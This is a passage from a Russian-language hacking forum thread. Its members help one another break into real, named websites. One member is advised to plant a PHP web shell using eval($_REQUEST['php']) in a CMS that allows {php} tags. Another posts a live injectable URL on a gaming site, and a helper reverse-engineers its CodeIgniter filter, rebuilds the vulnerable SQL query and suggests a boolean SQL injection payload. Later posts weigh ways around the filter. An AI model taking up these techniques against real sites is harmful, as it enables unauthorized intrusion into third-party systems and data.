Старый 28.07.2012, 12:51   #2191
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от Dig Посмотреть сообщение
Читал я эти статьи.Без них не лез бы в это дело. Фильтруются ' * ( ) \ % # Что на это скажете ?
Что нужно пробовать его обходить. Без линка тебе вряд ли кто-то поможет.
Цитата:
Сообщение от kingbeef Посмотреть сообщение
Как залить шелл,если поддерживается только тег {php} ?
{php} phpinfo(); {/php}

Страница с кодом по адресу /index.php?page=shell
Что за CMS / редактор? В тегах {php}{/php} код выполнился? Тогда используй eval($_REQUEST['php']);
Untitled вне форума   Ответить с цитированием
Старый 28.07.2012, 13:07   #2192
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение

Что за CMS / редактор? В тегах {php}{/php} код выполнился? Тогда используй eval($_REQUEST['php']);
CMS Pure
kingbeef вне форума   Ответить с цитированием
Старый 28.07.2012, 19:17   #2193
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Я несколько вопросов спросил. С CMS Pure ни разу не сталкивался.
Untitled вне форума   Ответить с цитированием
Старый 29.07.2012, 02:59   #2194
Dig
 
Регистрация: 27.07.2012
Сообщений: 5
Репутация: 0
По умолчанию

вот ссылка прошу помощи , сообщество.

gаmеrер точка оrg/аddоns/user/-1%20--
Dig вне форума   Ответить с цитированием
Старый 29.07.2012, 14:23   #2195
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от Dig Посмотреть сообщение
вот ссылка прошу помощи , сообщество.

gаmеrер точка оrg/аddоns/user/-1%20--
Написан с использованием CodeIgniter'a. Фильтрация приблизительно такого типа:
PHP код:
function _filter_uri($str)
    {
        if (
$str != '' && $this->config->item('permitted_uri_chars') != '' && $this->config->item('enable_query_strings') == FALSE)
        {
            
// preg_quote() in PHP 5.3 escapes -, so the str_replace() and addition of - to preg_quote() is to maintain backwards
            // compatibility as many are unaware of how characters in the permitted_uri_chars will be parsed as a regex pattern
            
if ( ! preg_match("|^[".str_replace(array('\\-''\-'), '-'preg_quote($this->config->item('permitted_uri_chars'), '-'))."]+$|i"$str))
            {
                
show_error('The URI you submitted has disallowed characters.'400);
            }
        }

        
// Convert programatic characters to entities
        
$bad    = array('$',        '(',        ')',        '%28',        '%29');
        
$good    = array('& #36;',    '& #40;',    '& #41;',    '& #40;',    '& #41;');

        return 
str_replace($bad$good$str);
    } 
Где $this->config->item('permitted_uri_chars') по дефолту:
PHP код:
$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-'
Именно в том скрипте ничего лучше, чем
Код:
http://gamerep[dot]org/addons/user/54924 AND 1 LIKE 1
пока не придумал. Скобки не проходят - за пределы первого запроса не выйти, подзапросы с SELECT не применить. Через $_POST CodeIgniter эти параметры принимать не будет.

Последний раз редактировалось Untitled; 30.07.2012 в 00:46..
Untitled вне форума   Ответить с цитированием
Старый 30.07.2012, 00:20   #2196
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Товарищи!

Давайте не постить ссылки на ресурсы, это ужасно и не корректно.
Покажите первый запрос, в котором надо обойти фильтрацию скобки для сферического коня в вакууме.
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 30.07.2012, 00:49   #2197
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от d0znpp Посмотреть сообщение
Покажите первый запрос, в котором надо обойти фильтрацию скобки для сферического коня в вакууме.
PHP код:
SELECT count(addons.addon_id) as count FROM (`addons`) LEFT JOIN `collaboratorsON `collaborators`.`collab_addonid` = `addons`.`addon_idWHERE `addons`.`addon_name` != 'blank' AND `addons`.`addon_status` != 'Hidden' AND (addon_userid ={SQLi} OR collaborators.collab_userid = {SQLi}) GROUP BY `addon_id
Untitled вне форума   Ответить с цитированием
Старый 30.07.2012, 01:13   #2198
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
PHP код:
SELECT count(addons.addon_id) as count FROM (`addons`) LEFT JOIN `collaboratorsON `collaborators`.`collab_addonid` = `addons`.`addon_idWHERE `addons`.`addon_name` != 'blank' AND `addons`.`addon_status` != 'Hidden' AND (addon_userid ={SQLi} OR collaborators.collab_userid = {SQLi}) GROUP BY `addon_id
один параметр попадает в SQL запрос дважды, или это два разных параметра?
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 30.07.2012, 01:45   #2199
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Один и тот же параметр участвует два раза в одном запросе.
Untitled вне форума   Ответить с цитированием
Старый 31.07.2012, 00:37   #2200
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Ну с такими жесткими фильтрами пока ничего не придумалось. Хотел бы /*!select 123*/ вектор впихнуть
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot